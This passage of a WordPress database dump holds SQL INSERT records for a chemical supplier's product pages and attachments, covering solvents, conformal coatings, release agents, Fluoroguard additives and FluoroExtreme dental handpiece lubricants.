Suitable for removing oil, ionic salts and particulate matter. Removes all types of organic flux. Excellent for spot flux removal. Ideal for field service, production and prototype work. Evaporates quickly and leaves no residue. No ODC (ozone depleting chemicals).', 'publish', 'open', 'closed', '', 'heavy-duty-solvent-ms-555-ms-557', '', '', '2017-04-07 17:46:46', '2017-04-07 17:46:46', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1384', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1385, 2, '2016-09-09 12:46:00', '2016-09-09 12:46:00', '', 'MS-555, 557', '', 'inherit', 'open', 'closed', '', 'ms-555-557', '', '', '2016-09-09 12:46:00', '2016-09-09 12:46:00', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-555-557.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1386, 2, '2016-09-09 13:08:43', '2016-09-09 13:08:43', '', 'Heavy Duty Solvent', '', 'inherit', 'open', 'closed', '', 'flux-remover', '', '', '2017-04-07 17:45:11', '2017-04-07 17:45:11', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/flux-remover.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1387, 2, '2016-09-09 13:25:13', '2016-09-09 13:25:13', '', 'ms-114c-conformal-coating-stripper', '', 'inherit', 'open', 'closed', '', 'ms-114c-conformal-coating-stripper', '', '', '2016-09-09 13:25:13', '2016-09-09 13:25:13', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-114c-conformal-coating-stripper.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1388, 2, '2016-09-09 13:25:22', '2016-09-09 13:25:22', '', 'ms-122ad-ptfe-release-agent', '', 'inherit', 'open', 'closed', '', 'ms-122ad-ptfe-release-agent', '', '', '2016-09-09 13:25:22', '2016-09-09 13:25:22', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-122ad-ptfe-release-agent.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1389, 2, '2016-09-09 13:25:29', '2016-09-09 13:25:29', '', 'ms-122ad-red-release-agent', '', 'inherit', 'open', 'closed', '', 'ms-122ad-red-release-agent', '', '', '2016-09-09 13:25:29', '2016-09-09 13:25:29', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-122ad-red-release-agent.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1390, 2, '2016-09-09 13:25:37', '2016-09-09 13:25:37', '', 'ms-122av-ptfe-release-agent', '', 'inherit', 'open', 'closed', '', 'ms-122av-ptfe-release-agent', '', '', '2016-09-09 13:25:37', '2016-09-09 13:25:37', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-122av-ptfe-release-agent.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1391, 2, '2016-09-09 13:25:45', '2016-09-09 13:25:45', '', 'ms-122se-ptfe-release-agent', '', 'inherit', 'open', 'closed', '', 'ms-122se-ptfe-release-agent', '', '', '2016-09-09 13:25:45', '2016-09-09 13:25:45', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-122se-ptfe-release-agent.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1392, 2, '2016-09-09 13:25:53', '2016-09-09 13:25:53', '', 'ms-143ax-ptfe-release-agent', '', 'inherit', 'open', 'closed', '', 'ms-143ax-ptfe-release-agent', '', '', '2016-09-09 13:25:53', '2016-09-09 13:25:53', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-143ax-ptfe-release-agent.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1393, 2, '2016-09-09 13:26:02', '2016-09-09 13:26:02', '', 'ms-222l-aero-duster', '', 'inherit', 'open', 'closed', '', 'ms-222l-aero-duster', '', '', '2016-09-09 13:26:02', '2016-09-09 13:26:02', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-222l-aero-duster.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1394, 2, '2016-09-09 13:26:09', '2016-09-09 13:26:09', '', 'ms-222n-aero-duster', '', 'inherit', 'open', 'closed', '', 'ms-222n-aero-duster', '', '', '2016-09-09 13:26:09', '2016-09-09 13:26:09', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-222n-aero-duster.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1395, 2, '2016-09-09 13:26:18', '2016-09-09 13:26:18', '', 'ms-242l-quik-freeze', '', 'inherit', 'open', 'closed', '', 'ms-242l-quik-freeze', '', '', '2016-09-09 13:26:18', '2016-09-09 13:26:18', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-242l-quik-freeze.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1396, 2, '2016-09-09 13:26:27', '2016-09-09 13:26:27', '', 'ms-255-surface-prep-clean', '', 'inherit', 'open', 'closed', '', 'ms-255-surface-prep-clean', '', '', '2016-09-09 13:26:27', '2016-09-09 13:26:27', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-255-surface-prep-clean.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1397, 2, '2016-09-09 13:26:36', '2016-09-09 13:26:36', '', 'ms-260-plastic-glass-metal-cleaner', '', 'inherit', 'open', 'closed', '', 'ms-260-plastic-glass-metal-cleaner', '', '', '2016-09-09 13:26:36', '2016-09-09 13:26:36', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-260-plastic-glass-metal-cleaner.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1398, 2, '2016-09-09 13:26:44', '2016-09-09 13:26:44', '', 'ms-280-ipa-clean', '', 'inherit', 'open', 'closed', '', 'ms-280-ipa-clean', '', '', '2016-09-09 13:26:44', '2016-09-09 13:26:44', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-280-ipa-clean.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1399, 2, '2016-09-09 13:26:53', '2016-09-09 13:26:53', '', 'ms-381h-connector-lubricant', '', 'inherit', 'open', 'closed', '', 'ms-381h-connector-lubricant', '', '', '2016-09-09 13:26:53', '2016-09-09 13:26:53', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-381h-connector-lubricant.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1400, 2, '2016-09-09 13:27:03', '2016-09-09 13:27:03', '', 'ms-452n-protective-varnish', '', 'inherit', 'open', 'closed', '', 'ms-452n-protective-varnish', '', '', '2016-09-09 13:27:03', '2016-09-09 13:27:03', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-452n-protective-varnish.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1401, 2, '2016-09-09 13:27:11', '2016-09-09 13:27:11', '', 'ms-460h-silicone-conformal-coating', '', 'inherit', 'open', 'closed', '', 'ms-460h-silicone-conformal-coating', '', '', '2016-09-09 13:27:11', '2016-09-09 13:27:11', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-460h-silicone-conformal-coating.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1402, 2, '2016-09-09 13:27:18', '2016-09-09 13:27:18', '', 'ms-462h-silicone-conformal-coating', '', 'inherit', 'open', 'closed', '', 'ms-462h-silicone-conformal-coating', '', '', '2016-09-09 13:27:18', '2016-09-09 13:27:18', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-462h-silicone-conformal-coating.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1403, 2, '2016-09-09 13:27:26', '2016-09-09 13:27:26', '', 'ms-465c-acrylic-conformal-coating', '', 'inherit', 'open', 'closed', '', 'ms-465c-acrylic-conformal-coating', '', '', '2016-09-09 13:27:26', '2016-09-09 13:27:26', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-465c-acrylic-conformal-coating.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1404, 2, '2016-09-09 13:27:34', '2016-09-09 13:27:34', '', 'ms-467c-acrylic-conformal-coating', '', 'inherit', 'open', 'closed', '', 'ms-467c-acrylic-conformal-coating', '', '', '2016-09-09 13:27:34', '2016-09-09 13:27:34', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-467c-acrylic-conformal-coating.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1405, 2, '2016-09-09 13:27:42', '2016-09-09 13:27:42', '', 'ms-470c-urethane-conformal-coating', '', 'inherit', 'open', 'closed', '', 'ms-470c-urethane-conformal-coating', '', '', '2016-09-09 13:27:42', '2016-09-09 13:27:42', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-470c-urethane-conformal-coating.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1406, 2, '2016-09-09 13:27:49', '2016-09-09 13:27:49', '', 'ms-470s-urethane-conformal-coating', '', 'inherit', 'open', 'closed', '', 'ms-470s-urethane-conformal-coating', '', '', '2016-09-09 13:27:49', '2016-09-09 13:27:49', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-470s-urethane-conformal-coating.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1407, 2, '2016-09-09 13:27:58', '2016-09-09 13:27:58', '', 'ms-472S-urethane-conformal-coating', '', 'inherit', 'open', 'closed', '', 'ms-472s-urethane-conformal-coating', '', '', '2016-09-09 13:27:58', '2016-09-09 13:27:58', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-472S-urethane-conformal-coating.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1408, 2, '2016-09-09 13:28:07', '2016-09-09 13:28:07', '', 'ms-475c-acrylic-conformal coating', '', 'inherit', 'open', 'closed', '', 'ms-475c-acrylic-conformal-coating', '', '', '2016-09-09 13:28:07', '2016-09-09 13:28:07', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-475c-acrylic-conformal-coating.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1409, 2, '2016-09-09 13:28:16', '2016-09-09 13:28:16', '', 'ms-477c-acrylic-conformal-coating', '', 'inherit', 'open', 'closed', '', 'ms-477c-acrylic-conformal-coating', '', '', '2016-09-09 13:28:16', '2016-09-09 13:28:16', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-477c-acrylic-conformal-coating.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1410, 2, '2016-09-09 13:28:25', '2016-09-09 13:28:25', '', 'ms-720l-precision-cleaning-solvent', '', 'inherit', 'open', 'closed', '', 'ms-720l-precision-cleaning-solvent', '', '', '2016-09-09 13:28:25', '2016-09-09 13:28:25', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-720l-precision-cleaning-solvent.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1411, 2, '2016-09-09 13:28:33', '2016-09-09 13:28:33', '', 'ms-720-precision-cleaning-agent', '', 'inherit', 'open', 'closed', '', 'ms-720-precision-cleaning-agent', '', '', '2016-09-09 13:28:33', '2016-09-09 13:28:33', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-720-precision-cleaning-agent.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1412, 2, '2016-09-09 13:28:41', '2016-09-09 13:28:41', '', 'ms-725-flux-remover', '', 'inherit', 'open', 'closed', '', 'ms-725-flux-remover', '', '', '2016-09-09 13:28:41', '2016-09-09 13:28:41', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-725-flux-remover.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1413, 2, '2016-09-09 13:28:50', '2016-09-09 13:28:50', '', 'ms-730-contact-re-nu', '', 'inherit', 'open', 'closed', '', 'ms-730-contact-re-nu', '', '', '2016-09-09 13:28:50', '2016-09-09 13:28:50', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-730-contact-re-nu.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1414, 2, '2016-09-09 13:28:59', '2016-09-09 13:28:59', '', 'ms-730l-contact-re-nu', '', 'inherit', 'open', 'closed', '', 'ms-730l-contact-re-nu', '', '', '2016-09-09 13:28:59', '2016-09-09 13:28:59', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-730l-contact-re-nu.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1415, 2, '2016-09-09 13:29:07', '2016-09-09 13:29:07', '', 'ms-738-contact-re-nu', '', 'inherit', 'open', 'closed', '', 'ms-738-contact-re-nu', '', '', '2016-09-09 13:29:07', '2016-09-09 13:29:07', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-738-contact-re-nu.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1416, 2, '2016-09-09 13:29:16', '2016-09-09 13:29:16', '', 'ms-745-vertrel-xsi-silicone-solvent', '', 'inherit', 'open', 'closed', '', 'ms-745-vertrel-xsi-silicone-solvent', '', '', '2016-09-09 13:29:16', '2016-09-09 13:29:16', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-745-vertrel-xsi-silicone-solvent.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1417, 2, '2016-09-09 13:29:25', '2016-09-09 13:29:25', '', 'ms-755l-solvent', '', 'inherit', 'open', 'closed', '', 'ms-755l-solvent', '', '', '2016-09-09 13:29:25', '2016-09-09 13:29:25', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-755l-solvent.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1418, 2, '2016-09-09 13:29:33', '2016-09-09 13:29:33', '', 'ms-755-vertrel-smt-solvent', '', 'inherit', 'open', 'closed', '', 'ms-755-vertrel-smt-solvent', '', '', '2016-09-09 13:29:33', '2016-09-09 13:29:33', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-755-vertrel-smt-solvent.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1419, 2, '2016-09-09 13:29:42', '2016-09-09 13:29:42', '', 'ms-760-cleaning-agent', '', 'inherit', 'open', 'closed', '', 'ms-760-cleaning-agent', '', '', '2016-09-09 13:29:42', '2016-09-09 13:29:42', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-760-cleaning-agent.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1420, 2, '2016-09-09 13:29:50', '2016-09-09 13:29:50', '', 'ms-770-vertrel-mca-plus', '', 'inherit', 'open', 'closed', '', 'ms-770-vertrel-mca-plus', '', '', '2016-09-09 13:29:50', '2016-09-09 13:29:50', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-770-vertrel-mca-plus.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1421, 2, '2016-09-09 13:29:58', '2016-09-09 13:29:58', '', 'ms-780-vertrel-xf-cleaning-agent', '', 'inherit', 'open', 'closed', '', 'ms-780-vertrel-xf-cleaning-agent', '', '', '2016-09-09 13:29:58', '2016-09-09 13:29:58', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-780-vertrel-xf-cleaning-agent.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1422, 2, '2016-09-09 13:30:07', '2016-09-09 13:30:07', '', 'releasys-82-semi-permanent-mold-release', '', 'inherit', 'open', 'closed', '', 'releasys-82-semi-permanent-mold-release', '', '', '2016-09-09 13:30:07', '2016-09-09 13:30:07', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/releasys-82-semi-permanent-mold-release.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1423, 2, '2016-09-09 13:30:16', '2016-09-09 13:30:16', '', 'releasys-85-semi-permanent-mold-release', '', 'inherit', 'open', 'closed', '', 'releasys-85-semi-permanent-mold-release', '', '', '2016-09-09 13:30:16', '2016-09-09 13:30:16', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/releasys-85-semi-permanent-mold-release.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1424, 2, '2016-09-09 13:30:24', '2016-09-09 13:30:24', '', 'releasys-88-semi-permanent-mold-release', '', 'inherit', 'open', 'closed', '', 'releasys-88-semi-permanent-mold-release', '', '', '2016-09-09 13:30:24', '2016-09-09 13:30:24', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/releasys-88-semi-permanent-mold-release.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1425, 2, '2016-09-09 13:30:33', '2016-09-09 13:30:33', '', 'releasys-89-semi-permanent-mold-release', '', 'inherit', 'open', 'closed', '', 'releasys-89-semi-permanent-mold-release', '', '', '2016-09-09 13:30:33', '2016-09-09 13:30:33', '', 1384, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/releasys-89-semi-permanent-mold-release.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1426, 3, '2017-07-06 12:12:08', '2017-07-06 12:12:08', '<h2>FluoroExtreme™ Dental Handpiece Lubricants</h2>\n<h3>Superior Wear Protection; Quieter Handpieces; Longer Turbine and Bearing Life</h3>\nFluoroExtreme Dental Handpiece Lubricant - Few medical applications challenge a bearing lubricant more than high-<wbr />speed dental handpieces.  Rotating at speeds of excess of 500,000 rpm, these handpieces require advanced lubrication which can not only maintain excellent thin-<wbr />film strength, but also do not degrade under the immense mechanical and thermal stresses which occur within these handpieces turbines. FluoroExtreme Dental Handpiece Lubricants are the perfect match for your dental handpiece.\n\nFluoroExtreme™ are fluorinated synthetic Dental Handpiece Lubricants specially designed for dental tooling and handpieces. Our Dental Handpiece Lubricants offer superior protection, lubricity, and chemical stability versus standard hydrocarbon based dental lubricants. FluoroExtreme™ minimizes mechanical wear in all low and high speed handpieces, allowing devices to run longer and quieter  while reducing costly repair intervals. Benefits Include:\n<ul>\n 	<li class="Body P-5"><span class="C-8">Minimizes mechanical wear</span></li>\n 	<li class="Body P-5"><span class="C-8">Reduction in debris formation</span></li>\n 	<li class="Body P-5"><span class="C-8">Quieter operation</span></li>\n 	<li class="Body P-5"><span class="C-8">Extends service life of critical components</span></li>\n 	<li class="Body P-5"><span class="C-8">Biocompatible (ISO 10993)</span></li>\n</ul>\n<h3>FluoroExtreme™ Dental Handpiece Lubricants: Unmatched lubrication; No Dirty Deposits; Steri Stable</h3>\nProperly lubricated, the ball bearings inside a dental handpiece travel around the raceway on a thin film of oil, which prevents direct contact with the raceway. If the oil is not properly designed, however, the speeding balls are an accident waiting to happen. If a ball hits even a microscopic particle in the oil at high speed, the oil film will likely rupture and some scarring of the ball or raceway is likely. Over time, these collisions create unwanted noise, accelerated wear, and shorten the operating life. FluoroExtreme™  developed no deposits, the o-<wbr />rings remained intact, and the impellers exhibited minimal wear.  Dental handpieces have no noticeable increase in turbine noise. The data clearly shows that Miller-<wbr />Stephenson’s FluoroExtreme™, delivers substantially improved operation of your dental handpiece. Our handpiece lubricant minimizes the unsightly degradation seen with hydrocarbon-<wbr />based lubricants while maintaining quiet and clean operation.  Something both the operator and patient will value.\n\nTo learn more about the case study regarding FluoroExtreme and Hydrocarbons in Dental Handpieces please <a href="https://www.miller-stephenson.com/dental-handpiece-lubricant/">click here.</a>', 'FluoroExtreme™ Dental Handpiece Lubricants', 'FluoroExtreme™ is a fluorinated synthetic lubricant specially designed for dental handpieces. This lubricant offers superior protection, lubricity, and chemical stability versus standard hydrocarbon based dental lubricants. FluoroExtreme™ minimizes mechanical wear in all low and high speed handpieces, allowing devices to run longer and quieter  while reducing costly repair intervals.\n<ul>\n 	<li class="Body P-5"><span class="C-8">Minimizes mechanical wear</span></li>\n 	<li class="Body P-5"><span class="C-8">Reduction in debris formation</span></li>\n 	<li class="Body P-5"><span class="C-8">Quieter operation</span></li>\n 	<li class="Body P-5"><span class="C-8">Extends service life of critical components</span></li>\n 	<li class="Body P-5"><span class="C-8">Biocompatible (ISO 10993)</span></li>\n</ul>', 'inherit', 'closed', 'closed', '', '474-autosave-v1', '', '', '2017-07-06 12:12:08', '2017-07-06 12:12:08', '', 474, 'https://132.148.10.86/wordpress/474-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1428, 2, '2016-09-09 14:21:46', '2016-09-09 14:21:46', '', 'Fluoroguard™ PCA', 'Fluoroguard™ PCA is a colorless, odorless, nonflammable, and chemically inert polymer compounding additive based on fluorinated synthetic oil (perfluoropolyether). It has excellent color and UV/thermal stability.  Added to plastics and elastomers, it improves the processing and performance of products.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'closed', 'closed', '', 'fluoroguard-pca', '', '', '2017-02-24 19:12:27', '2017-02-24 19:12:27', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1428', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1429, 2, '2016-09-09 14:19:38', '2016-09-09 14:19:38', '', 'PCA', '', 'inherit', 'open', 'closed', '', 'pca', '', '', '2016-09-09 14:19:38', '2016-09-09 14:19:38', '', 1428, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/PCA.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1430, 2, '2016-09-09 14:20:55', '2016-09-09 14:20:55', '', 'krytox-fluoroguard-pca-oil', '', 'inherit', 'open', 'closed', '', 'krytox-fluoroguard-pca-oil', '', '', '2016-09-09 14:20:55', '2016-09-09 14:20:55', '', 1428, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/krytox-fluoroguard-pca-oil.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1431, 2, '2016-09-09 14:24:37', '2016-09-09 14:24:37', '', 'Fluoroguard™ SG', 'Fluoroguard™ SG is a colorless, odorless, nonflammable, and chemically inert polymer compounding additive based on fluorinated synthetic oil (perfluoropolyether). It has excellent color and UV/thermal stability.  Added to plastics and elastomers, it improves the processing and performance of products.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'closed', 'closed', '', 'fluoroguard-sg', '', '', '2017-02-24 19:12:12', '2017-02-24 19:12:12', '', 0, 'https://132.148.10.86/wordpress/product/fluoroguard-sg/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1432, 2, '2016-09-09 14:31:02', '2016-09-09 14:31:02', '', 'SG', '', 'inherit', 'open', 'closed', '', 'sg', '', '', '2016-09-09 14:31:02', '2016-09-09 14:31:02', '', 1431, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/SG.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1433, 2, '2016-09-09 14:35:00', '2016-09-09 14:35:00', '', 'krytox-sg-oil', '', 'inherit', 'open', 'closed', '', 'krytox-sg-oil', '', '', '2016-09-09 14:35:00', '2016-09-09 14:35:00', '', 1431, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/krytox-sg-oil.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1434, 2, '2016-09-09 14:41:08', '2016-09-09 14:41:08', '', 'Vazo 52 Radical Initiator', '', 'inherit', 'open', 'closed', '', 'krytox-pca-oil', '', '', '2016-11-24 03:52:28', '2016-11-24 03:52:28', '', 1428, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/krytox-pca-oil.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1435, 2, '2016-09-09 14:41:53', '2016-09-09 14:41:53', '', 'Fluoroguard™ PRO', 'Fluoroguard™ PRO is a colorless, odorless, nonflammable, and chemically inert polymer compounding additive based on fluorinated synthetic oil (perfluoropolyether). It has excellent color and UV/thermal stability.  Added to plastics and elastomers, it improves the processing characteristics and properties of polymer compounds.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'closed', 'closed', '', 'fluoroguard-pro', '', '', '2017-02-24 19:11:55', '2017-02-24 19:11:55', '', 0, 'https://132.148.10.86/wordpress/product/fluoroguard-pro/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1436, 2, '2016-09-09 14:45:18', '2016-09-09 14:45:18', '', 'krytox-pro-oil', '', 'inherit', 'open', 'closed', '', 'krytox-pro-oil', '', '', '2016-09-09 14:45:18', '2016-09-09 14:45:18', '', 1435, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/krytox-pro-oil.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1437, 3, '2016-09-09 14:51:19', '2016-09-09 14:51:19', '', 'Dental Lubricant instructions', '', 'inherit', 'open', 'closed', '', 'dental-lubricant-instructions-2', '', '', '2016-09-09 14:51:19', '2016-09-09 14:51:19', '', 474, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Dental-Lubricant-instructions-1.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1438, 3, '2016-09-09 14:51:47', '2016-09-09 14:51:47', '', 'Dental', '', 'inherit', 'open', 'closed', '', 'dental-3', '', '', '2016-09-09 14:51:47', '2016-09-09 14:51:47', '', 474, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Dental-1.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1441, 2, '2016-09-09 17:09:55', '2016-09-09 17:09:55', '', 'hexion-heloxy-modifier-107', '', 'inherit', 'open', 'closed', '', 'hexion-heloxy-modifier-107', '', '', '2016-09-09 17:09:55', '2016-09-09 17:09:55', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/hexion-heloxy-modifier-107.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1442, 2, '2016-09-09 17:10:04', '2016-09-09 17:10:04', '', 'hexion-heloxy-modifier-116', '', 'inherit', 'open', 'closed', '', 'hexion-heloxy-modifier-116', '', '', '2016-09-09 17:10:04', '2016-09-09 17:10:04', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/hexion-heloxy-modifier-116.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1443, 2, '2016-09-09 17:10:14', '2016-09-09 17:10:14', '', 'ms-143te-ptfe-release-agent', '', 'inherit', 'open', 'closed', '', 'ms-143te-ptfe-release-agent', '', '', '2016-09-09 17:10:14', '2016-09-09 17:10:14', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-143te-ptfe-release-agent.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1444, 2, '2016-09-09 17:10:22', '2016-09-09 17:10:22', '', 'ms-143xd-ptfe-release-agent', '', 'inherit', 'open', 'closed', '', 'ms-143xd-ptfe-release-agent', '', '', '2016-09-09 17:10:22', '2016-09-09 17:10:22', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-143xd-ptfe-release-agent.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1445, 2, '2016-09-09 17:10:32', '2016-09-09 17:10:32', '', 'ms-153bn-release-agent', '', 'inherit', 'open', 'closed', '', 'ms-153bn-release-agent', '', '', '2016-09-09 17:10:32', '2016-09-09 17:10:32', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-153bn-release-agent.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1446, 2, '2016-09-09 17:10:40', '2016-09-09 17:10:40', '', 'ms-472c-urethane-conformal-coating', '', 'inherit', 'open', 'closed', '', 'ms-472c-urethane-conformal-coating', '', '', '2016-09-09 17:10:40', '2016-09-09 17:10:40', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-472c-urethane-conformal-coating.jpg', 0, 'attachment', 'image/jpeg', 0); 
